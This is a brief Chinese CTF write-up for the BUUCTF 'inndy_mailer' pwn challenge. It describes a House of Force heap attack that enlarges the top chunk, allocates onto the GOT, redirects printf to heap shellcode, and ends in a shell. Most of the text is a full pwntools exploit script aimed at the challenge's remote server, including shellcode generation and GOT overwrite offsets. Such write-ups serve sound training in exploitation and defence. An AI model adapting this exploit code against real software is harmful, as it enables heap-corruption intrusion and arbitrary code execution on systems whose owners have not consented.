buuctf:inndy_mailer HOF的利用
上物理的时候无聊,闲着往下滑打开了一个题,没想到拿了个一血
简单题,house of force怼就完了
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/house_of_force-zh/
程序没对size做检查,首先考虑hof
任意堆溢出,改top chunk的size为0xffffffff,然后分配到got表上方,由于printf在最上面,改printf为地址即可,在堆上写shellcode,有rwx,最后size调一下就出了
exp
from pwn import *
local = 0
binary = "./mailer"
port = "27219"
if local == 1:
p = process(binary)
else:
p = remote("node3.buuoj.cn",port)
def dbg():
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
def add(size,title,content):
p.sendlineafter('Action: ','1')
p.sendlineafter('Content Length:',str(size))
p.sendlineafter('Title:',title)
p.sendlineafter('Content:',content)
def show():
p.sendlineafter('Action: ','2')
context(arch = 'i386',os = 'linux')
shellcode = shellcraft.sh()
shellcode = asm(shellcode)
print "len:",len(shellcode)
payload = shellcode.ljust(0x40,'a') + p32(0x50) # use fwrite , to change size
add(0x10,payload,'b' * 0x10)
payload = 'd' * 0x20 + p32(0) + p32(0xffffffff)
add(0x20,'cccc', payload)
show()
p.recvuntil('b' * 0x10)
p.recv(4)
p.recv(4)
heap = u32(p.recv(4)) - 0x8
print "[*] heap:",hex(heap)
elf = ELF(binary)
top_chunk = heap + 0xd0
print "[*] top_chunk:",hex(top_chunk)
size = elf.got["printf"] - top_chunk
final_size = size - 0x48 - 0x10
print "[*] distance:",hex(size)
add(final_size,'aaaa','bbbb')
p.sendline('1')
p.sendline(str(0x15))
p.sendline(p32(heap + 0xc))
# gdb.attach(p)
p.interactive()